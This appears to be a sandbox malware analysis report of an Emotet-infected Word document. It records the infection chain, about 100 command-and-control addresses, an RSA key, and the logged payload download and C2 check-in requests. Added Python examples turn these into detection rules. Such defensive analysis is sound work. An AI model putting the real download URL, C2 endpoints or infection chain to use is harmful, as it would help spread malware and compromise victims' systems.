Analysis Report INV_226554.doc

Overview

General Information

Sample Name: INV_226554.doc
Analysis ID: 286595
MD5: b30424f6bd5580a79cb62f1f98baba60
SHA1: f94d01885af24341f210f45239e95fcdd0b02f06
SHA256: 29e6800b32fe83e4c3eea894351d851e0ba7013aa256aa96ca27b0423fe084d8

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Powershell drops PE file
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains capabilities to detect virtual machines
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2384 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • powershell.exe (PID: 2532 cmdline: powershell -e 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • Ui0i6m6.exe (PID: 960 cmdline: 'C:\Users\user\Kxfed14\Ds583rh\Ui0i6m6.exe' MD5: 2F027092A8B72AD23326185FFC1A1FFB)
      • devenum.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\prevhost\devenum.exe MD5: 2F027092A8B72AD23326185FFC1A1FFB)
  • cleanup
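The process chain above is the part of this report most worth turning into detection logic: Word spawns PowerShell with an encoded command, PowerShell drops and starts an executable under the user profile, and that executable starts a copy of itself (identical MD5) from a directory under C:\Windows\SysWOW64. The following is an added example, not part of the Joe Sandbox report and not Emotet code: a small Python triage routine run over process-creation records. The PIDs, image paths and MD5s are transcribed from the Startup tree; because the report redacts the real encoded command, the PowerShell payload is a harmless placeholder that the block encodes itself (UTF-16LE, then base64, which is what powershell -e expects). The 1000-character long-command-line threshold is an assumption, not a value from the report.

```python
import base64
import re

# Constructed process-creation records modelled on the report's Startup tree.
# PIDs, image paths and MD5s are transcribed from the report; the report redacts
# the real encoded command, so the PowerShell payload is a harmless placeholder.
PLACEHOLDER_SCRIPT = "Write-Host 'placeholder for the redacted encoded command'"
ENCODED = base64.b64encode(PLACEHOLDER_SCRIPT.encode("utf-16-le")).decode("ascii")

PROCESSES = [
    {"pid": 2384, "ppid": None, "md5": "95C38D04597050285A18F66039EDB456",
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r"'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding"},
    {"pid": 2532, "ppid": 2384, "md5": "852D67A27E454BD389FA7F02A8CBE23F",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -e " + ENCODED},
    {"pid": 960, "ppid": 2532, "md5": "2F027092A8B72AD23326185FFC1A1FFB",
     "image": r"C:\Users\user\Kxfed14\Ds583rh\Ui0i6m6.exe",
     "cmdline": r"'C:\Users\user\Kxfed14\Ds583rh\Ui0i6m6.exe'"},
    {"pid": 2304, "ppid": 960, "md5": "2F027092A8B72AD23326185FFC1A1FFB",
     "image": r"C:\Windows\SysWOW64\prevhost\devenum.exe",
     "cmdline": r"C:\Windows\SysWOW64\prevhost\devenum.exe"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for a base64 UTF-16LE script.
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
LONG_CMDLINE = 1000  # assumed threshold; the report only says "very long"


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline):
    """Return the decoded script behind -e/-enc, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(processes):
    """Return (pid, flag, detail) findings for the chains the report shows."""
    by_pid = {p["pid"]: p for p in processes}
    findings = []
    for p in processes:
        parent = by_pid.get(p["ppid"])
        name = basename(p["image"])
        pname = basename(parent["image"]) if parent else ""
        # Office document handing off to a script host.
        if pname in OFFICE_APPS and name in SHELLS:
            findings.append((p["pid"], "office_spawns_shell", f"{pname} -> {name}"))
        # Encoded PowerShell: decode it so the analyst sees the real script.
        if name == "powershell.exe":
            script = decode_encoded_powershell(p["cmdline"])
            if script is not None:
                findings.append((p["pid"], "encoded_powershell", script))
        if len(p["cmdline"]) > LONG_CMDLINE:
            findings.append((p["pid"], "long_cmdline", str(len(p["cmdline"]))))
        # Script host starting a fresh executable out of the user profile.
        if pname in SHELLS and p["image"].lower().startswith("c:\\users\\"):
            findings.append((p["pid"], "shell_launches_user_profile_exe", p["image"]))
        # Same hash as the parent, now running from under C:\Windows: self-copy persistence.
        if (parent and parent["image"].lower().startswith("c:\\users\\")
                and p["image"].lower().startswith("c:\\windows\\")
                and parent["md5"].lower() == p["md5"].lower()):
            findings.append((p["pid"], "self_copy_into_windows_dir",
                             f"{parent['image']} -> {p['image']}"))
    return findings


if __name__ == "__main__":
    for pid, flag, detail in triage(PROCESSES):
        print(f"{pid:>5}  {flag:<32} {detail}")
```

Run against the four records this yields one finding per link of the chain; the same routine fed with Sysmon event ID 1 or EDR process-creation records (pid, parent pid, image, command line, hash) catches the pattern without needing the dropped file's name, which changes per sample.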

Malware Configuration

Threatname: Emotet

{"C2 list": ["74.219.172.26:80", "134.209.36.254:8080", "104.156.59.7:8080", "120.138.30.150:8080", "194.187.133.160:443", "104.236.246.93:8080", "74.208.45.104:8080", "78.187.156.31:80", "187.161.206.24:80", "94.23.216.33:80", "172.91.208.86:80", "91.211.88.52:7080", "50.91.114.38:80", "200.123.150.89:443", "121.124.124.40:7080", "62.75.141.82:80", "5.196.74.210:8080", "24.137.76.62:80", "85.105.205.77:8080", "139.130.242.43:80", "82.225.49.121:80", "110.145.77.103:80", "195.251.213.56:80", "46.105.131.79:8080", "87.106.136.232:8080", "75.139.38.211:80", "124.41.215.226:80", "203.153.216.189:7080", "162.241.242.173:8080", "219.74.18.66:443", "174.45.13.118:80", "68.188.112.97:80", "200.114.213.233:8080", "213.196.135.145:80", "61.92.17.12:80", "61.19.246.238:443", "219.75.128.166:80", "120.150.60.189:80", "123.176.25.234:80", "1.221.254.82:80", "137.119.36.33:80", "94.23.237.171:443", "74.120.55.163:80", "62.30.7.67:443", "104.131.11.150:443", "139.59.67.118:443", "209.141.54.221:8080", "79.137.83.50:443", "84.39.182.7:80", "97.82.79.83:80", "87.106.139.101:8080", "94.1.108.190:443", "37.187.72.193:8080", "139.162.108.71:8080", "93.147.212.206:80", "74.134.41.124:80", "103.86.49.11:8080", "75.80.124.4:80", "109.74.5.95:8080", "153.232.188.106:80", "168.235.67.138:7080", "50.35.17.13:80", "42.200.107.142:80", "82.80.155.43:80", "78.24.219.147:8080", "24.43.99.75:80", "107.5.122.110:80", "156.155.166.221:80", "83.169.36.251:8080", "47.144.21.12:443", "79.98.24.39:8080", "181.169.34.190:80", "139.59.60.244:8080", "85.152.162.105:80", "185.94.252.104:443", "110.5.16.198:80", "174.102.48.180:443", "140.186.212.146:80", "95.179.229.244:8080", "104.32.141.43:80", "169.239.182.217:8080", "121.7.127.163:80", "94.200.114.161:80", "201.173.217.124:443", "104.131.44.150:8080", "137.59.187.107:8080", "5.39.91.110:7080", "203.117.253.142:80", "157.245.99.39:8080", "176.111.60.55:8080", "95.213.236.64:8080", "220.245.198.194:80", "37.139.21.175:8080", "89.216.122.92:80", 
"139.99.158.11:443", "24.179.13.119:80", "188.219.31.12:80"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

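The extracted configuration is the most directly actionable part of the report: the C2 list converts into blocklist or IDS entries, and the "RSA Public Key" is a base64 DER SubjectPublicKeyInfo that decodes to a 768-bit modulus with e = 65537, a size no legitimate software uses, which makes the key itself a usable fingerprint. The CryptImportKey, CryptGenKey, CryptExportKey and CryptEncrypt sequence in devenum.exe later in this report is consistent with importing that key and exporting a generated session key under it, and CryptVerifySignatureW with checking the C2 reply. The block below is an added example, not code from the report or from Joe Security. It embeds the RSA public key exactly as listed above and, to keep the listing short, only the first twelve C2 entries; the DER reader is a minimal hand-written TLV walker sufficient for this one structure (no cryptography dependency), and the Suricata rule text and the sid range starting at 9000001 are assumptions for illustration.

```python
import base64
import ipaddress
from collections import Counter

# The RSA public key exactly as it appears in the extracted configuration above,
# and (to keep the listing short) only the first twelve of the C2 entries.
EMOTET_CONFIG = {
    "C2 list": [
        "74.219.172.26:80", "134.209.36.254:8080", "104.156.59.7:8080", "120.138.30.150:8080",
        "194.187.133.160:443", "104.236.246.93:8080", "74.208.45.104:8080", "78.187.156.31:80",
        "187.161.206.24:80", "94.23.216.33:80", "172.91.208.86:80", "91.211.88.52:7080",
    ],
    "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\n"
                      "Q0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\n"
                      "fkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB",
}


def parse_c2(entries):
    """Split 'ip:port' strings into (ip, port) tuples, rejecting malformed ones."""
    out = []
    for entry in entries:
        host, sep, port = entry.rpartition(":")
        if not sep or not port.isdigit():
            raise ValueError(f"malformed C2 entry: {entry!r}")
        out.append((str(ipaddress.IPv4Address(host)), int(port)))
    return out


def port_histogram(c2):
    return Counter(port for _, port in c2)


def suricata_rules(c2, sid_base=9000001):
    """One alert rule per C2 endpoint (rule text and sid range are assumptions)."""
    return [
        f'alert tcp $HOME_NET any -> {ip} {port} (msg:"Emotet C2 {ip}:{port}"; '
        f"flow:to_server,established; sid:{sid_base + i}; rev:1;)"
        for i, (ip, port) in enumerate(c2)
    ]


def der_tlv(buf, pos):
    """Minimal DER tag-length-value reader (short and long length forms)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_spki(b64):
    """Return (modulus_bits, public_exponent) from a base64 SubjectPublicKeyInfo."""
    der = base64.b64decode(b64)              # embedded newlines are discarded
    tag, spki, _ = der_tlv(der, 0)           # SubjectPublicKeyInfo ::= SEQUENCE
    assert tag == 0x30, "expected outer SEQUENCE"
    _, _alg, pos = der_tlv(spki, 0)          # AlgorithmIdentifier (rsaEncryption)
    tag, bits, _ = der_tlv(spki, pos)        # subjectPublicKey ::= BIT STRING
    assert tag == 0x03 and bits[0] == 0, "expected BIT STRING with 0 unused bits"
    _, rsa, _ = der_tlv(bits[1:], 0)         # RSAPublicKey ::= SEQUENCE { n, e }
    _, n_bytes, pos = der_tlv(rsa, 0)
    _, e_bytes, _ = der_tlv(rsa, pos)
    n = int.from_bytes(n_bytes, "big")
    e = int.from_bytes(e_bytes, "big")
    return n.bit_length(), e


if __name__ == "__main__":
    c2 = parse_c2(EMOTET_CONFIG["C2 list"])
    print("ports:", dict(port_histogram(c2)))
    print("RSA modulus bits, e:", parse_rsa_spki(EMOTET_CONFIG["RSA Public Key"]))
    print("\n".join(suricata_rules(c2)[:2]))
```

Feeding the full list from the configuration above instead of the twelve-entry subset needs no other change. The port histogram matters operationally: a good share of the endpoints listen on 80 and 443, so port-based egress filtering alone does not cut this botnet off, and the rules have to key on the destination addresses.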
Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.2155228913.0000000000251000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
00000005.00000002.2347834119.0000000000250000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
00000004.00000002.2155254458.0000000000274000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
00000005.00000002.2347858587.0000000000264000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
00000005.00000002.2347874608.0000000000281000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
(1 further memory-dump match is not shown on this page)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.Ui0i6m6.exe.250000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -
5.2.devenum.exe.280000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | -

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: INV_226554.doc | Avira: detected
Found malware configuration
Source: 00000005.00000002.2347834119.0000000000250000.00000040.00000001.sdmp | Malware Configuration Extractor: Emotet (the C2 list and RSA public key as given in the Malware Configuration section above)
Multi AV Scanner detection for domain / URL
Source: case.gonukkad.com | Virustotal: Detection: 7%
Source: http://dprkp.palembang.go.id/sys-cache/7Y4aHw/ | Virustotal: Detection: 11%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Virustotal: Detection: 13%
Multi AV Scanner detection for submitted file
Source: INV_226554.doc | Virustotal: Detection: 62%
Source: INV_226554.doc | ReversingLabs: Detection: 34%
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_00403690 CryptAcquireContextA,CryptAcquireContextA,4_2_00403690
Source: C:\Windows\SysWOW64\prevhost\devenum.exe | Code function: 5_2_002825A0 CryptAcquireContextW,CryptImportKey,LocalFree,CryptCreateHash,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,5_2_002825A0
Source: C:\Windows\SysWOW64\prevhost\devenum.exe | Code function: 5_2_00282210 CryptDestroyHash,CryptExportKey,CryptDuplicateHash,CryptGetHashParam,CryptEncrypt,memcpy,GetProcessHeap,HeapFree,5_2_00282210
Source: C:\Windows\SysWOW64\prevhost\devenum.exe | Code function: 5_2_00281FA0 CryptDuplicateHash,CryptDestroyHash,memcpy,CryptVerifySignatureW,CryptDecrypt,5_2_00281FA0
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_004366D0 FindFirstFileA,FindClose,4_2_004366D0
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_004356B4 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,4_2_004356B4
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_002538B0 GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,4_2_002538B0
Source: C:\Windows\SysWOW64\prevhost\devenum.exe | Code function: 5_2_002838B0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,5_2_002838B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: case.gonukkad.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 128.199.16.135:443 (listed twice)
Source: global traffic | HTTP traffic detected:
    GET /sys-cache/7Y4aHw/ HTTP/1.1
    Host: dprkp.palembang.go.id
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 185.201.10.61
Source: Joe Sandbox View | IP Address: 157.230.44.117
Source: Joe Sandbox View | IP Address: 128.199.16.135
Source: Joe Sandbox View | ASN Name: UCCS-UNIVERSITY-OF-COLORADO-COLORADO-SPRINGSUS
Source: global traffic | HTTP traffic detected:
    POST /2ZZ2YEZCC3YCR8f/YCAstcVGXXd/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 74.219.172.26/2ZZ2YEZCC3YCR8f/YCAstcVGXXd/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=-------------------waKsDZVzOpDUHl5DcFw
    Host: 74.219.172.26
    Content-Length: 4468
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 74.219.172.26 (listed 7 times)
Source: C:\Windows\SysWOW64\prevhost\devenum.exe | Code function: 5_2_00282900 HttpQueryInfoW,InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,5_2_00282900
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{68ACA82A-6F93-4194-97B0-E6749671AC21}.tmp
Source: global traffic | HTTP traffic detected: GET /sys-cache/7Y4aHw/ HTTP/1.1 to dprkp.palembang.go.id (same request as listed above)
Source: unknown | DNS traffic detected: queries for: case.gonukkad.com
Source: unknown | HTTP traffic detected: POST /2ZZ2YEZCC3YCR8f/YCAstcVGXXd/ HTTP/1.1 to 74.219.172.26 (same request as listed above)
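The check-in POST above deserves a closer look than the signature list gives it. Its User-Agent claims Firefox 75 on Windows NT 6.3, but the analysis machine is Windows 7 (NT 6.1); the Host is a bare IP literal; the Referer is not an absolute URL (real browsers always send one with a scheme) and merely repeats the request's own host and path; and Host is not the first header, unlike a real Firefox request, an ordering that together with the trailing Cache-Control: no-cache is consistent with the WinINet calls seen in devenum.exe (HttpQueryInfoW, InternetReadFile) rather than with a browser. The earlier GET to dprkp.palembang.go.id carries no User-Agent at all, which is the report's "HTTP GET or POST without a user agent" signature. The block below is an added example, not code from the report: it parses both requests (transcribed from the report; the POST body is not on the page and is omitted) and returns these observations as named flags. The header-order and NT-version checks are heuristics added here, not report signatures, and the client OS version is passed in as a parameter because the request alone cannot tell it.

```python
import ipaddress
import re

# Both requests transcribed from the report's network section. The POST body
# (4468 bytes) is not on the page, so only the headers are reproduced.
POST_REQUEST = (
    "POST /2ZZ2YEZCC3YCR8f/YCAstcVGXXd/ HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "DNT: 1\r\n"
    "Connection: keep-alive\r\n"
    "Referer: 74.219.172.26/2ZZ2YEZCC3YCR8f/YCAstcVGXXd/\r\n"
    "Upgrade-Insecure-Requests: 1\r\n"
    "Content-Type: multipart/form-data; boundary=-------------------waKsDZVzOpDUHl5DcFw\r\n"
    "Host: 74.219.172.26\r\n"
    "Content-Length: 4468\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
GET_REQUEST = (
    "GET /sys-cache/7Y4aHw/ HTTP/1.1\r\n"
    "Host: dprkp.palembang.go.id\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into its parts, keeping header order."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    order, headers = [], {}
    for line in header_lines:
        name, _, value = line.partition(":")
        order.append(name.strip().lower())
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "order": order, "body": body}


def is_ip_literal(host):
    """True for a bare IPv4 Host value such as '74.219.172.26' (optional :port)."""
    try:
        ipaddress.IPv4Address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def analyze_request(raw, client_nt_version=None):
    """Return {flag: detail} for the browser-impersonation tells in one request.

    client_nt_version is the NT version of the machine that sent the request
    (Windows 7 is "6.1"); that check is a heuristic added here, not a report signature.
    """
    req = parse_request(raw)
    h = req["headers"]
    host = h.get("host", "")
    ua = h.get("user-agent")
    findings = {}
    if ua is None:
        findings["missing_user_agent"] = "no User-Agent header"
    if is_ip_literal(host):
        findings["host_is_ip_literal"] = host
        if req["method"] == "POST" and h.get("content-type", "").startswith("multipart/form-data"):
            findings["multipart_post_to_ip_literal"] = h["content-type"]
    ref = h.get("referer")
    if ref is not None:
        # Real browsers send an absolute URL (with scheme) in Referer.
        if not re.match(r"https?://", ref, re.IGNORECASE):
            findings["referer_not_absolute"] = ref
        ref_host, _, ref_path = re.sub(r"^https?://", "", ref, flags=re.IGNORECASE).partition("/")
        if ref_host == host and "/" + ref_path == req["path"]:
            findings["referer_points_to_self"] = ref
    # Firefox emits Host first; a Firefox UA with Host buried late is a tell.
    if ua and "Firefox/" in ua and req["order"] and req["order"][0] != "host":
        findings["host_header_not_first"] = ", ".join(req["order"][:3])
    if ua and client_nt_version:
        m = re.search(r"Windows NT (\d+\.\d+)", ua)
        if m and m.group(1) != client_nt_version:
            findings["ua_os_mismatch"] = f"UA says NT {m.group(1)}, client runs NT {client_nt_version}"
    return findings


if __name__ == "__main__":
    for label, raw in (("POST", POST_REQUEST), ("GET", GET_REQUEST)):
        print(label, analyze_request(raw, client_nt_version="6.1"))
```

None of these flags is conclusive alone (internal tools POST to IP literals, and some proxies rewrite Referer), but a multipart POST to a bare IP whose Referer is a schemeless copy of its own URL, from a process that is not a browser, is a combination worth alerting on regardless of which C2 address is in use.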
Source: Ui0i6m6.exe, 00000004.00000002.2155723486.0000000001FF0000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2348169037.0000000001E30000.00000002.00000001.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: Ui0i6m6.exe, 00000004.00000002.2157537366.0000000002C80000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2349220019.0000000003990000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Ui0i6m6.exe, 00000004.00000002.2155723486.0000000001FF0000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2348169037.0000000001E30000.00000002.00000001.sdmp | String found in binary or memory: http://treyresearch.net
Source: Ui0i6m6.exe, 00000004.00000002.2155723486.0000000001FF0000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2348169037.0000000001E30000.00000002.00000001.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: Ui0i6m6.exe, 00000004.00000002.2157537366.0000000002C80000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2349220019.0000000003990000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: Ui0i6m6.exe, 00000004.00000002.2155723486.0000000001FF0000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2348169037.0000000001E30000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: Ui0i6m6.exe, 00000004.00000002.2155723486.0000000001FF0000.00000002.00000001.sdmp, devenum.exe, 00000005.00000002.2348169037.0000000001E30000.00000002.00000001.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_0040BDF0 GetPropA,GetClientRect,CreateCompatibleDC,CreateCompatibleBitmap,SendMessageA,SendMessageA,BitBlt,GetMessagePos,GetDCEx,GetWindowDC,ReleaseDC,CallWindowProcA,4_2_0040BDF0
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_00434637 GetKeyState,GetKeyState,GetKeyState,GetKeyState,4_2_00434637
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_004446A5 GetKeyState,GetKeyState,GetKeyState,4_2_004446A5
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_0043294D GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,4_2_0043294D
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_004409EE ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,4_2_004409EE
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_00447A61 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,4_2_00447A61
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_00447A76 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,4_2_00447A76
Source: C:\Users\user\KXfED14\DS583Rh\Ui0i6m6.exe | Code function: 4_2_0042DD8A __EH_prolog,GetKeyState,GetKeyState,GetKeyState,